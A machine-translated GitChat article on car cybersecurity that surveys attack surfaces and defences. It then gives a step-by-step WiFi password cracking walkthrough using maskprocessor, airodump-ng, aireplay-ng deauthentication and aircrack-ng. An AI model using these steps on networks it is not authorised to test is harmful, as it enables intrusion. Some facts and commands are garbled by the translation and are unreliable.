This article is from the author Liu Pan’s “360° Anatomy of How hackers break into Your car” on GitChat. “Read the article” and see what questions people have exchanged with the author

【 Don’t miss the Easter egg 】

Edit | whalen

preface

The development of automobile is regarded as another intelligent terminal after mobile phone. It is undeniable that the change from PC to mobile phone has brought about the change of information age and the update from Internet to mobile Internet. Products and enterprises have also evolved from Microsoft and Intel in the PC era to Google and Apple in the mobile era.

I’m waiting to see what the next era will be and who will dominate the next product. No one doubts that the future will be an era of interconnection of all things. Under the great ecology of interconnection of all things, the automobile is regarded as the next intelligent terminal to change human life.

Many of the world’s most creative and in-depth companies are racing to bring them to market, and there is good reason to believe that the economic and social achievements they will produce are enormous. But any change in technology will bring new challenges and risks in addition to the benefits.

One of the biggest threats to transportation is vehicle network security. And with Internet connectivity, user authentication, smart devices and circuitry are in large part part of the new generation of vehicles.

But unlike information technology departments, operating system changes, adjustments, new tools and software can’t be rolled out to production lines and users are already on the way, anything is about to respond in real time.

By contrast, the pace of change remains slow, and for the automotive industry, this has significant implications for identifying security vulnerabilities and the measures needed to fix and fix them.

First, the current situation of automobile network security

Last year, two white hat hackers remotely took control of a Jeep Cherokee. Of course, this “incident” was a potential hazard, but no serious damage. Kroessler later recalled 1.4 million vehicles.

This year has seen researchers at Europe’s largest car club (ADAC) demonstrate the popularity of keyless “comfort locking” mechanisms on the market, no doubt technologically savvy thieves.

In Volkswagen groups such as Alfa Romeo, Chevrolet, Ford, Lancia, Opel, Peugeot and Renault, cheap and easy-to-use hardware tools can be used to bypass the locking mechanism of an entire range of vehicles.

One of the core challenges of vehicle network security is that the vehicle’s various ECUs are connected through the internal network. Thus, if hackers manage to access peripheral ECUs that are vulnerable to tools (such as a car’s Bluetooth or infotainment system), they can take control of critical ECUs, such as brakes or engines, and wreak havoc.

Today’s cars have more than 100 ECUs, with over 100 million lines of code, giving a huge supply side. While the difficulty is that automakers obtain ECU from many different suppliers, it means that no single hacker can control or even be familiar with all of the vehicle’s source code.

Two, the car is easy to attack the surface

More and more cars are attached with energy, which means that there are more and more points to attack cars. As shown in the figure above, many points are “superior” functions of new energy vehicles compared with traditional cars, such as remote control of mobile phones and remote monitoring on the cloud.

Communication and entertainment systems are particularly vulnerable and can be reverse-engineered to access API libraries to facilitate data sharing between systems. From here, the attack CAN even inject malicious code into the Electronic Control Unit (ECU) and controller Area Network (CAN) bus, which controls critical systems such as electric steering and braking.

OBD device is used by manufacturers to diagnose various data of automobiles. This interface integrates many CAN bus interfaces of ECU, through which OBD interface CAN access other devices of automobiles by changing direction.

For example, wipers, air conditioners, etc. At present, many start-up companies are doing car control based on OBD peripherals, but the current work is not warm, and some companies are even doing automatic driving schemes based on this interface.

All in all, OBD is the easiest interface to control a car. Secondly, the connection module is also the focus of hackers’ attacks. For automobiles, the connection module, such as WIFI, Bluetooth and USB, is full of the risk of being “intimate” every time it is connected to the vehicle. Once the data is obtained, it can be decoded and analyzed, so as to reverse operation and control the vehicle according to the manufacturer’s agreement.

Finally, I will focus on the networking equipment of cars, which is the most vulnerable aspect of cars. The networking of traditional cars is provided by TBOX, just like the concept of PC network card. Plug in PC to make it have the function of networking.

The peripheral accesses the TSP server for data sending and receiving through the specified protocol, which is full of “harvest” surprises for hackers. Use a diagram to illustrate how each ECU is controlled through TBOX.

There are many risks that can be cracked when connecting to the TSP server. The mobile app, web browser and even the phone controlling the car can all be reference points. Cracking through the Internet of vehicles is relatively easy compared with the current PC and mobile Internet, because the car is a product with slow development and update. Many automakers’ servers don’t even provide secure encryption algorithms.

Network attack, of course, is one of the steps of invasion of the car, the car point relative to the PC or the phone to attacked is the car itself is a product of high integration, there are a lot of different vendors ECU, each parts suppliers or oems agreement has its own set of car, the and the agreement is unknown to the public, This is the most difficult for hackers to attack the car barrier, but also the car’s most secure layer of protection.

Three, the car safety strategy

Security is a relative concept of contradiction and shield. There is no absolute security. Theoretically speaking, every security protection can be cracked by hackers. Here from different angles as far as possible to introduce you to the car before and even after the road what safety measures.

The first is security at the software development stage, including static checks, which companies can use, such as coverity, a tool for code static checks, to effectively check code for vulnerabilities. Secondly, test and check the localization of the code before it is released. Simulate and reproduce the code according to the possible means of hackers’ invasion to ensure that the loopholes are blocked in the cradle. Finally, conduct the penetration test of Trust zone according to the supplier’s plan.

To sum up, every company’s solution is different. Here I will use end-to-end development as an example to illustrate how network security starts with components. The reason for adopting end-to-end solutions is to ensure that the highest level of security is possible at all times.

Think about cyber security from day one of product development so that potential security vulnerabilities don’t appear in the first place. Consider not only initial development, but the entire product life cycle.

Abnormal for example CAN constantly check the CAN bus communication, and the communication between all the control units are encrypted, permanent monitoring the current state of the vehicle system CAN also add more safety, regularly report to the security center, the test result to inspection car fleet security holes, so that we CAN quickly develop and implement security patches, It can be quickly imported via OTA technology updates, eliminating the need for maintenance center visits.

To sum up, network security can be protected from five aspects:

  1. Data interface encryption

  2. Car network bus protection monitoring

  3. Vehicle health data monitoring

  4. Hardware protection for security modules such as Trustzone

  5. Cloud server data transmission processing

How do hackers attack your car

Using the TBOX attack as an example of how to hack the TSP server, WIFI is usually the weak point of the network because WIFI signals can be seen everywhere. Many other routers contain vulnerabilities that can be easily exploited with the right equipment and software, such as the tools that come with Kali Linux. Start with Wireshark, a tool for capturing, filtering, and examining network packets.

Wireshark, a network analysis tool formerly known as Ethereal, captures packets in real time and displays them in a human-readable format. Wireshark includes filters, color coding, and other features that give you insight into network traffic and examine individual packets.

After downloading and installing the Wireshark, you can start it and double-click the network interface name under Capture to Capture data packets on that interface. For example, if you want to capture traffic on a wireless network, click the Wireless interface. You can configure advanced functionality by clicking Capture > Options, but you don’t need it now.

Once you click the name of the interface, you will see the packets start to display in real time. Wireshark captures every packet sent to or from your system.

If you enable promiscuous mode – which is enabled by default – you can also see all other packets on the network, not just those addressed to the network adapter.

To check whether promiscuous mode is enabled, click Capture > Options, and verify that the Enable Promiscuous mode on All Interfaces check box is at the bottom of this window.

Click on a packet to select it, and you can dig into it to see its details.

The data clicked in the figure is the corresponding address of the TSP server, and the packet header information and content of this network can be seen. Then use crack tools to crack it.

The first step is to create a list of all possible combinations of passwords with eight uppercase letters. We will use Maskprocessor in Kali Linux to create a list of passwords.

We will authenticate with the client connected to Aireplay NG and shake Airodump Ng four times. The final step is to use Aicrack NG to enforce the password.

  1. Maskprocessor will be used to generate a list of passwords, piping the file per letter into a file so that we can use multiple computers to speed up password enforcement.

    Mask processor A? U? U? U? U? U? u -o /usr/A.txt

    Mask processor B? U? U? U? U? U? U? u -o /usr/B.txt

    Mask processor C? U? U? U? U? U? u -o /usr/C.txt

    And so on. Repeat for each letter of the alphabet. The file size of each document will be about 60 GB.

  2. The next thing we do is capture the handshake with Airodump-ng. We will first use airodump-ng to select our target, retrieve its BSSID and broadcast it over the WiFi access point.

    We will then use Aireplay-ng to authenticate the connected client to force a reconnection, which will give us a quarter of the handshake requirements. Now let’s start airodump-ng and find our target with the following command:

    $airodump-ng mon0

    Now select your target’s BSSID and channel, and restart airodump-ng with the following command, and look for connected clients:

    $airodump-ng -bssid [BSSID] -c [channel] -w [filepath to store .cap] wlan0mon

    Open a new terminal and issue a command to the connected client using aireplay-ng.

    aireplay-ng -0 2 -a [BSSID] -c [Client MAC] mon0

    Decertification successful and 4-way handshake caught!

  3. Finally use the following command to force the password through Aircrack-ng:

    Aircrack -ng -a 2-b [router BSSID] -w [file path to password list] [File path to.cap file]

    Will eventually crack the password:

eggs

Blockbuster Chat

5 Learning Strategies for Learning Faster and Faster

Share:

Seaborn Lee, a programmer who writes code live at Station B, juggles balls, plays Ukulele, extreme fitness, runs, writes jokes, draws, translates, writes, speaks, trains. I like to realize my ideas with programming. I have made money in the Android market and have several start-up experiences.

Good at study, habit formation and time management. Physically influence others to make positive change! Currently, I work at ThoughtWorks, where I spread the idea of happy and productive programming. In his spare time, he founded codingstyle.cn, a software craftsman community, and organized more than 30 technical activities.

Chat profile:

When it comes to learning, it’s a big deal:

  • Fragmentation, no longer continuous time to learn

  • Hard to concentrate, holding up the book, the phone is calling: come, happy, anyway, there is plenty of time ~

  • Can’t do it, read a lot of books, but can’t do it in life

  • However, there is no use, learned methods and tools, can not find the use of the scene

  • Low efficiency, learning speed can not keep up with the speed of knowledge generation

  • Can’t remember, the speed of learning can’t keep up with the speed of forgetting

In this era of knowledge flooding and cross-border competition, learning ability is the core competitiveness. Can you think of anything you could have accomplished in the past week that didn’t require studying?

Despite its importance, most people don’t research learning, believing that by opening “get” and listening to a book on their way to and from work, they are fragmented and lifelong learners.

Want to join this Chat for free?

Follow the “GitChat Technology Chat” public account

And reply “Efficient learning” in the background.

👇

“Read the transcript” to view the Chat transcript